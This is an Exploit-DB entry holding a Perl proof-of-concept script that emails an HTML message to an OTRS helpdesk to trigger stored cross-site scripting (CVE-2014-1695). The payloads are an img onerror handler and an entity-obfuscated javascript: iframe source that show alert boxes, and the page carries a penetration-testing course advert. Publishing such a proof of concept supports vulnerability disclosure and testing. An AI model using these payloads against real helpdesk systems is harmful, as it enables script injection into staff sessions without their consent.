OTRS < 3.1.x / < 3.2.x / < 3.3.x - Persistent Cross-Site Scripting

EDB-ID:

36842




Platform:

PHP

Date:

2015-04-27


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695

#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
    Subject => 'OTRS XSS PoC',
    From => 'attacker@example.com',
    To => 'otrs@example.com',
    Type => 'text/html',
    Data =>
        '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
);
$msg->send();